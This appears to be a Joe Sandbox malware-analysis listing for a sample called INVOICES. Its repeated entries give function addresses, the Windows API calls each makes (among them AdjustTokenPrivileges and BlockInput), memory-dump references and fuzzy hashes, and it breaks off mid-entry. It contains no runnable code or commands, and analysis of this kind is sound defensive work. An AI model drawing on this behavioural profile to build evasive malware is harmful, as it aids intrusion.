                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 314495775-0
                                                                                                                                  • Opcode ID: 8cf7761dd350dfacec919a3e9689eb8f1b458d2b4fc641229235e749fa58a1be
                                                                                                                                  • Instruction ID: c98bbeefa86faebab2b3222cb5ff76e7ad3b8dcde615b9cc65e00c55bc0b78f7
                                                                                                                                  • Opcode Fuzzy Hash: 8cf7761dd350dfacec919a3e9689eb8f1b458d2b4fc641229235e749fa58a1be
                                                                                                                                  • Instruction Fuzzy Hash: 2E219934205514EFDB149F28CC88EA53BD6AF06360F984254FA165B2F3C7396D51D750
                                                                                                                                  Function 0079C75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0079C787
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0079C7B7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 93ed3dbc6a5fbd5816e7029fe84449a6d1754503ca4bb3dde1a05a274491f27d
                                                                                                                                  • Instruction ID: 36606f2a9fd2cf326428014f68b7b721238f584a1e976351a68898133bbc1582
                                                                                                                                  • Opcode Fuzzy Hash: 93ed3dbc6a5fbd5816e7029fe84449a6d1754503ca4bb3dde1a05a274491f27d
                                                                                                                                  • Instruction Fuzzy Hash: CC118E326002049FDB10EF69D849A6AF7E8FF84320F00861EF9A997291DB74A800CB91
                                                                                                                                  Function 007BC5E7 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0076BABA,?,?,?), ref: 007BC65B
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007BC641
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1273190321-0
                                                                                                                                  • Opcode ID: 0b19c8d5993226c2c9374ddeaa37ec3aa5413914c547b8bfd16e6693bbebb286
                                                                                                                                  • Instruction ID: 7847c964242c026c56807e1e9012a61d01a2f357ba8f2b39f42688c264102f1d
                                                                                                                                  • Opcode Fuzzy Hash: 0b19c8d5993226c2c9374ddeaa37ec3aa5413914c547b8bfd16e6693bbebb286
                                                                                                                                  • Instruction Fuzzy Hash: 4D01D831200204EBDB225F14CC88FA63BB6FF85724F148139FA114B2E1C739A852DB94
                                                                                                                                  Function 007BC9A8 Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 007BC9CB
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0076BB96,?,?,?,?,?), ref: 007BC9F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3420055661-0
                                                                                                                                  • Opcode ID: e6ce97be8996b4ce937b1ddfe3cd62faa40e12748d457f11cf7d81252d3962b0
                                                                                                                                  • Instruction ID: 4761bb6cd324768deab4e17958ec9b01bf3a13d104e25065efef22711cf6d7ea
                                                                                                                                  • Opcode Fuzzy Hash: e6ce97be8996b4ce937b1ddfe3cd62faa40e12748d457f11cf7d81252d3962b0
                                                                                                                                  • Instruction Fuzzy Hash: E0F01772400218FFEB059F85DC09EAE7BB9EB48711F00826AF901A2161D3756A60EBA4
                                                                                                                                  Function 0079A0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007A957D,?,007BFB84,?), ref: 0079A121
                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007A957D,?,007BFB84,?), ref: 0079A133
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 2fefdb4f84db9c380b187e7d5b1d0281b6c30e279f5680e097b0a5434bdc5a94
                                                                                                                                  • Instruction ID: 064433f959b2425b0132ba1bcb659c81dd63f4d4ba08df97fe572e4691a2c688
                                                                                                                                  • Opcode Fuzzy Hash: 2fefdb4f84db9c380b187e7d5b1d0281b6c30e279f5680e097b0a5434bdc5a94
                                                                                                                                  • Instruction Fuzzy Hash: 95F05E7554522DFBDB20AAA4DC49FEA776CFF08761F008265F909D6281D6349940CBA1
                                                                                                                                  Function 007BCAE6 Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 007BCAEE
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0076BB15,?,?,?,?), ref: 007BCB1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 830246eae9a9eeac11563444c220b415ffac57eb0d8872d36b648bd84af51433
                                                                                                                                  • Instruction ID: 3457371f73fbcbc0d8545f1776f04495321c3281a40583d750045bea7208bd42
                                                                                                                                  • Opcode Fuzzy Hash: 830246eae9a9eeac11563444c220b415ffac57eb0d8872d36b648bd84af51433
                                                                                                                                  • Instruction Fuzzy Hash: 4FE04F70100258BBEB155F19DC1AFBA3B54EB04751F10C215F996D90E1C674A850D764
                                                                                                                                  Function 007884F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00788631), ref: 00788508
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00788631), ref: 0078851A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                  • Opcode ID: b8c666fa956de0dcf857cf076539194c3da23dc146e8853536cd16ec3d14e6b1
                                                                                                                                  • Instruction ID: 0615d22683cb78b74e8274991adf756ca4e77a443666f196e8086ea2e1df2e2f
                                                                                                                                  • Opcode Fuzzy Hash: b8c666fa956de0dcf857cf076539194c3da23dc146e8853536cd16ec3d14e6b1
                                                                                                                                  • Instruction Fuzzy Hash: A4E08C32004600EFE7212F24EC08EB77BE9EF04315718C92DF89680470DF66ACA0DB90
                                                                                                                                  Function 0075A2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,007C4178,00758ED7,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 0075A2DA
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0075A2E3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: eda1d0809941c7a52235831e9a209927083fb1ce432bcf344ade53782394d206
                                                                                                                                  • Instruction ID: c79a09ea4873e3d384f3035ce4eb85ea600843cbebf55fd9bea24fb691b523eb
                                                                                                                                  • Opcode Fuzzy Hash: eda1d0809941c7a52235831e9a209927083fb1ce432bcf344ade53782394d206
                                                                                                                                  • Instruction Fuzzy Hash: 24B09231054208ABCA002B91EC09F883FA8EB44EA2F40C120F60E86060CB6654508A99
                                                                                                                                  Function 0075F359 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d838e02ae2c1b421526942a75e9a8bdf703a6af4e896f9fd2e2627cc66560ff
                                                                                                                                  • Instruction ID: 1a2dcebcef2fbd864f789d5b1f8c192bc22e2bde1c3244f443c12696174fb396
                                                                                                                                  • Opcode Fuzzy Hash: 9d838e02ae2c1b421526942a75e9a8bdf703a6af4e896f9fd2e2627cc66560ff
                                                                                                                                  • Instruction Fuzzy Hash: 4D320062D29F414DD7279A34C832326A349AFB73C5F15D73BEC1AB59A6EF2D88834104
                                                                                                                                  Function 007625AE Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 35315e05ed32673dabd4031bca82af3e9fd4d280a511298af042ecac552b3334
                                                                                                                                  • Instruction ID: 94d34bb4292d6c945702fb0c7e9c8fffca9f4ab96f0ca731088d8cbb829dd1e9
                                                                                                                                  • Opcode Fuzzy Hash: 35315e05ed32673dabd4031bca82af3e9fd4d280a511298af042ecac552b3334
                                                                                                                                  • Instruction Fuzzy Hash: 54B1F020D2AF854DD32396398835336BB5CAFBB2CAF51D71BFC2674D22EB2985834145
                                                                                                                                  Function 00798932 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __time64.LIBCMT ref: 00798944
                                                                                                                                    • Part of subcall function 0075537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00799017,00000000,?,?,?,?,007991C8,00000000,?), ref: 00755383
                                                                                                                                    • Part of subcall function 0075537A: __aulldiv.LIBCMT ref: 007553A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2893107130-0
                                                                                                                                  • Opcode ID: b920cf5245e84c68307085511f2d99bf3dbf77f91d19e723f6315c1d8c72bcac
                                                                                                                                  • Instruction ID: fa64b99477ba5d569852e8b33cfcb60734b8f4721ca8c5c95a2074a9a821ffbf
                                                                                                                                  • Opcode Fuzzy Hash: b920cf5245e84c68307085511f2d99bf3dbf77f91d19e723f6315c1d8c72bcac
                                                                                                                                  • Instruction Fuzzy Hash: DA21B472635510CBC729CF25D441A62B3E1EBA5320B288E6CD5F5CB2D0CA78B905CB54
                                                                                                                                  Function 007BD7F6 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 007BD8A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: a51eb819dd6e0d6d658b7f5471e5f8f113017ed1645efe1b2ccc9107f2b6bf38
                                                                                                                                  • Instruction ID: 814e85688f89517d27f1327bac1f130e65f2823ba3ccf54a76a6ae576a962ff6
                                                                                                                                  • Opcode Fuzzy Hash: a51eb819dd6e0d6d658b7f5471e5f8f113017ed1645efe1b2ccc9107f2b6bf38
                                                                                                                                  • Instruction Fuzzy Hash: 5A110A74200119FBFB385E2CCD09FF93B15DB41721F204334FA615A1D2DA6CAD019265
                                                                                                                                  Function 007BD422 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007325DB: GetWindowLongW.USER32(?,000000EB), ref: 007325EC
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0076BAD2,?,?,?,?,00000000,?), ref: 007BD49C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 7a51ed3508eb2e4785a836f8d167c3a0e7afa4ac9f92ef29b71b6ad435ff38ca
                                                                                                                                  • Instruction ID: 97dc371f186d3aa60b20e6567150c92b4d7cb701edd8a9d64fb9ab778e4ffd2c
                                                                                                                                  • Opcode Fuzzy Hash: 7a51ed3508eb2e4785a836f8d167c3a0e7afa4ac9f92ef29b71b6ad435ff38ca
                                                                                                                                  • Instruction Fuzzy Hash: D8012471600198BFDB249F29C849FFA3BA2EF41360F084164FE591B1A2D338BC20D7A0
                                                                                                                                  Function 0073189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00731B04,?,?,?,?,?), ref: 007318E2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 69a12da01efb28cf697a83e3ff8f4f4dafaf14113374166859335c24208c0af9
                                                                                                                                  • Instruction ID: 6c516c1b2e62d399ff344915b1a2102a482e5ef13c65b6e84c257d9f0b4545eb
                                                                                                                                  • Opcode Fuzzy Hash: 69a12da01efb28cf697a83e3ff8f4f4dafaf14113374166859335c24208c0af9
                                                                                                                                  • Instruction Fuzzy Hash: 80F08934600615DFDB14DF18D855D753BE1FB54360F508129FA524B3A2C739EC50DB64
                                                                                                                                  Function 007A401F Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • BlockInput.USER32(00000001), ref: 007A403A
                                                                                                                                  Memory Dump Source
